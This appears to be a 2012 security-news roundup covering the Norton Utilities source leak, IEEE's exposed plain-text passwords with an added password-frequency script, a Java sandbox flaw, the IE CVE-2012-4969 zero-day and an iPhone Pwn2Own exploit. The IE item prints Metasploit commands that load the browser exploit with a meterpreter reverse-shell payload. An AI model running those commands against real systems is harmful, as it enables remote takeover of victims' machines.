Symantec Norton Utilities 2006 source code leaked by Anonymous

Hackers associated with the Anonymous hacktivist collective published the source code files for Symantec’s Norton Utilities 2006 product on The Pirate Bay BitTorrent website on Monday, but according to the security vendor the same files had already been released in January.

The Pirate Bay torrent was accompanied by a message in which the hackers referred to Symantec as “the worst security vendor on planet earth” and hinted that the release is not the result of a new security breach. “As many of you know this was planned back before Sabu was arrested,” the hacker said.

Sabu, the founder of the Anonymous-affiliated hacker group LulzSec, was arrested in June 2011 and subsequently worked as an informant for the FBI. However, the public didn’t learn about his arrest and FBI involvement until March 2012.

“Symantec is aware of the claims made online that a group has posted the source code for Norton Utilities 2006,” Cris Paden, manager of corporate communications at Symantec, said Tuesday via email. “We have analyzed the code that was already posted by another group in January 2012.”

At the beginning of January, a group of hackers called Lords of Dharmaraja, also affiliated with Anonymous, claimed to have stolen the source code for multiple Symantec products and tried to extort money from the company.

A few days later, the group released the source code for the 2006 version of Norton Utilities with the intention of helping a Washington state man’s lawsuit against Symantec. The man had filed a complaint claiming that the trial versions of Norton Utilities and several other Symantec products display misleading information about the “health” of their users’ computers in order to scare them into buying the full version of the products.

Norton Utilities is a product that bundles various Windows system optimization and maintenance tools, such as a registry defragmenter, a registry cleaner, file recovery, a services manager and others.

“As we stated at that time, the 2006 version of Norton Utilities is no longer sold or supported,” Paden said. “The current version of Norton Utilities has been completely rebuilt and shares no common code with Norton Utilities 2006.”

Furthermore, the leak of the code poses no security threat to users of the latest version of Norton Utilities or other Symantec products, Paden said.

100k IEEE site Plain-Text Passwords found on Public FTP

Researcher Finds 100k IEEE.org Passwords Stored in Plain-Text on Public FTP Server

The Institute of Electrical and Electronics Engineers (IEEE) stored usernames and passwords for its users in a plain-text file on a publicly accessible server, a Romanian computer scientist has claimed.

A plaintext file containing nearly 100,000 credentials was accessible on an IEEE.org FTP server for at least one month before it was discovered on Sept. 18, Radu Drăgușin, a teaching assistant in the computer science department at the University of Copenhagen, Denmark, wrote on the IEEElog.com site Tuesday. The file contained users who were employees at companies such as Apple, Google, IBM, Oracle, and Samsung, as well as researchers from NASA, Stanford University, and other institutions, Dragusin wrote.

In addition to exposing usernames and passwords for IEEE members, the FTP server contained the ieee.org Web site logs and the visitor activity log for spectrum.ieee.org, Dragusin said. It appears the IEEE Web administrators “failed to restrict access” to the Web server logs for both sites, allowing anyone to view the contents. Every Web request to the Web sites, more than 376 million HTTP requests in total, was recorded in those files, Dragusin wrote.

Web server logs should never be publicly accessible as the files generally contain information that can be used to identify users and correlate their browsing activity. It appears that IEEE has closed that security hole, as the files are no longer available.

“If leaving an FTP directory containing 100GB of logs publicly open could be a simple mistake in setting access permissions, keeping both usernames and passwords in plaintext is much more troublesome,” Dragusin wrote.

Security experts have stressed time and time again that best practices call for storing salted cryptographic hashes of passwords, using an algorithm that hasn’t already been broken. For a professional association that includes computer science professionals and publishes security publications, keeping passwords in plaintext, and then storing them in the same location as the server logs, is a colossal, and baffling, mistake to make.

It’s not known at this time whether the file was accessed before Dragusin found it. If someone else got to the file first, those users are at risk of spear phishing attacks or other targeted campaigns. If the IEEE has access logs for its FTP server, the organization would be able to determine the extent of the damage, Dragusin speculated.

According to Dragusin’s Twitter and Google+ posts, IEEE has yet to notify users, but the organization had posted a note to its website Tuesday afternoon, acknowledging a “security incident”.

“We have conducted a thorough investigation and the issue has been addressed and resolved. We are in the process of notifying those who may have been affected,” the IEEE wrote in the statement.

“It would be reasonable to assume, that an organization publishing leading security-focused publications, would value the privacy of its members, and be proactive in keeping their data secure,” Dragusin wrote.

Dragusin analyzed the raw data to figure out where the users were based, what email domains they were using, and which passwords were most common. His analysis of common passwords was particularly disappointing. The top five most popular passwords in the IEEE file turned out to be “123456,” “ieee2012,” “12345678,” “123456789,” and “password.” Considering that many IEEE members are security professionals and the organization has worked on various encryption and key management standards, the lack of password sophistication is worrisome.

There’s one positive thing to note, however, since it appears that a majority of the users are using unique passwords. It appears that the top five passwords are being used by only one percent of the affected users, and the top 18 passwords were used by less than two percent of users, according to Dragusin’s analysis.

IEEE has become aware of an incident regarding inadvertent access to unencrypted log files containing user IDs and passwords.
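The kind of frequency analysis Dragusin describes (share of accounts covered by the top N passwords, share of accounts whose password is unique, and passwords built from the organization’s name, as “ieee2012” is), written as an added example rather than his script. The credential lines are constructed for the example and the “username:password” layout is an assumption; the article does not show the real file’s format.

```python
from collections import Counter
from typing import Dict, Iterable, List, Sequence, Tuple

# Constructed sample in an assumed "username:password" layout (not the real
# IEEE file). The repeated values mirror the weak choices the article names.
SAMPLE_LINES = [
    "alice@example.org:123456",
    "bob@example.org:ieee2012",
    "carol@example.org:correct horse battery staple",
    "dave@example.org:123456",
    "erin@example.org:password",
    "frank@example.org:T9$kq!vL2#p",
    "grace@example.org:123456789",
    "heidi@example.org:12345678",
    "ivan@example.org:ieee2012",
    "judy@example.org:Zx7!mN4pQ@1",
]


def parse_credentials(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Split each 'user:password' line on the first colon only, so a password
    that itself contains ':' survives intact; blank or malformed lines are skipped."""
    creds = []
    for line in lines:
        line = line.rstrip("\r\n")
        if not line or ":" not in line:
            continue
        user, _, password = line.partition(":")
        creds.append((user, password))
    return creds


def password_stats(passwords: Sequence[str], top_n: int = 5) -> Dict[str, object]:
    """Report how concentrated the password choices are."""
    total = len(passwords)
    counts = Counter(passwords)
    top = counts.most_common(top_n)
    covered = sum(n for _, n in top)
    singletons = sum(1 for n in counts.values() if n == 1)
    return {
        "total": total,
        "distinct": len(counts),
        "top": top,
        "top_share": covered / total if total else 0.0,      # accounts using a top-N password
        "unique_share": singletons / total if total else 0.0,  # accounts whose password nobody else uses
    }


def org_derived(passwords: Iterable[str], org_tokens: Sequence[str] = ("ieee",)) -> List[str]:
    """Passwords containing the organisation's name, the pattern behind 'ieee2012'."""
    return [pw for pw in passwords if any(tok in pw.lower() for tok in org_tokens)]


if __name__ == "__main__":
    pws = [pw for _, pw in parse_credentials(SAMPLE_LINES)]
    stats = password_stats(pws)
    print(f"{stats['total']} accounts, {stats['distinct']} distinct passwords")
    print(f"top-5 cover {stats['top_share']:.0%}; unique passwords {stats['unique_share']:.0%}")
    print("org-derived:", org_derived(pws))
```

On the constructed sample the top five passwords cover 70% of accounts, far worse than the one percent Dragusin reported; the same functions run unchanged over a larger file, and the `top_share` figure is the one to compare against his numbers.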

Billions of Windows Users Affected by Java Vulnerability

A new Java vulnerability has surfaced that apparently affects all Java runtimes and therefore puts close to a billion users at risk:

It’s just a proof of concept for now, but a newly revealed Java vulnerability could have very widespread repercussions.

Security research company Security Explorations has issued a description of a new critical security flaw in Java SE 5 build 1.5.0_22-b03, Java SE 6 build 1.6.0_35-b10, and the latest Java SE 7 build 1.7.0_07-b10. The error stems from a discrepancy in how the Java virtual machine handles defined data types (a type-safety error), which violates a fundamental security constraint of the Java runtime and allows a complete bypass of the Java sandbox.

Security Explorations conducted tests on a fully patched Windows 7 machine and was able to exploit the bug using the Java plugin in the latest versions of the most popular browsers (Internet Explorer, Firefox, Chrome, Safari, and Opera). While the error was only tested on Windows 7 32-bit, being in Java means it is not limited to the Windows platform and will affect anyone with Java installed on their system, be it Windows, Linux, Mac, or Solaris.

Adam Gowdiak, CEO of Security Explorations, said in a blog post that Oracle has been alerted to the matter and that the company needs to pay attention:

“We hope that a news about one billion users of Oracle Java SE software [3] being vulnerable to yet another security flaw is not gonna spoil the taste of Larry Ellison’s [4] morning…Java.”

In an interview with ComputerWorld, Gowdiak explained that this is a new flaw in Java that has persisted even after Oracle’s most recent patch, and when exploited would allow an attacker to use a malicious Java applet to install programs, or read and change data on the system with the privileges of the current user.

Gowdiak also stresses that this is a zero-day flaw; however, zero-day usually means the flaw is used in active exploits on the same day it is found (giving developers “zero days” to issue a patch), but there is no mention of an active exploit for this bug, and Gowdiak’s descriptions of it, both on the Security Explorations blog and in ComputerWorld’s interview, suggest it is more of a proof of concept in its current state.

So far Oracle has been provided with a technical overview of the bug and example code outlining the flaw, but has not yet acted upon it. It is unfortunately not yet known when Oracle might do so. While for the most recent zero-day vulnerability Oracle broke its quarterly update schedule to address the problem, that was the first such step the company had taken, and it is possible it will fall back to its quarterly schedule and issue an update in just under a month, on October 16.

While this bug is more widespread than other recently found Java exploits, so far there is no concrete evidence of it being used in any malware; however, it does stress the importance of reducing the number of active runtimes (code execution environments) on your system. If you do not need Java, you are best off uninstalling or disabling it. If you are unsure whether you need Java, you might also remove it and reinstall it only if one of your activities prompts you for a Java runtime.

Exploit Released for Internet Explorer zero-day attacks : CVE-2012-4969

Microsoft has confirmed reports that a zero-day vulnerability in its Internet Explorer browser is being actively attacked in the wild. Four active exploits of the zero-day vulnerability in the browser exist. Microsoft will push out an out-of-cycle Windows patch to temporarily fix the critical Internet Explorer flaw.

Security researcher Eric Romang identified the exploit code on a server used by the “Nitro” hacking group, believed to have exploited the Java zero-day vulnerability reported last month. Security firm Rapid7 advises that Internet users try a different Web browser. The malware may be linked to an ongoing attack on companies that has been dubbed “Nitro” and was first discovered in October by Symantec.

The zero-day in IE 6 through 9 is a use-after-free memory corruption vulnerability, similar in effect to a buffer overflow, that enables an attacker to remotely execute code on a compromised machine. The original exploit payload dropped the Poison Ivy remote access Trojan (RAT) via a corrupted Flash movie file. The latest payload discovered dropped the PlugX RAT via the same corrupted Flash movie.

This type of attack typically begins with a phishing email, or by tricking users into clicking links in social media. The security advisory notes that mainstream websites that carry ads served by third-party ad servers could also expose visitors if the ad servers are compromised. In other words, any site could be used to take advantage of the IE flaw. It’s a serious flaw.

Even the German government has started telling its citizens to switch to other browsers. Microsoft has reported that most users are not affected by the bug and that the number of attacks has been limited. In the company’s update about the bug, it suggests either deactivating ActiveX controls or using its Enhanced Mitigation Experience Toolkit until a patch is released.

Metasploit has also released a PoC module for this flaw: “This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.”

Usage:

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid

iPhone 5 and 4 Hacked with same Exploit

IPHONE 5 JAILBREAK: IPHONE 5 HACKED WITH OLD EXPLOIT: The iPhone 5 is vulnerable to the same attack that successfully breached an iPhone 4S at the mobile Pwn2Own hacker contest held this week at the EUSecWest event in Amsterdam.

WHO? Joost Pol and Daan Keuper won the mobile Pwn2Own contest by compromising a fully patched iPhone 4S device and stealing contacts, browsing history, photos and videos from the phone.

COOL: The vaunted security of the iPhone 4S took an epic tumble during the event when they were able to build an exploit for a vulnerability in WebKit that defeated Apple’s code-signing features and the MobileSafari sandbox.

HMMM: The same bug is present in the iOS 6 Golden Master development code base, which means the iPhone 5 is also vulnerable to the same exploit. Apple iPads and iPod Touch devices are also vulnerable.

RESULT: “We specifically chose this one because it was present in iOS 6, which means the new iPhone coming out today will be vulnerable to this attack,” Pol said. The duo won $30,000 for their efforts.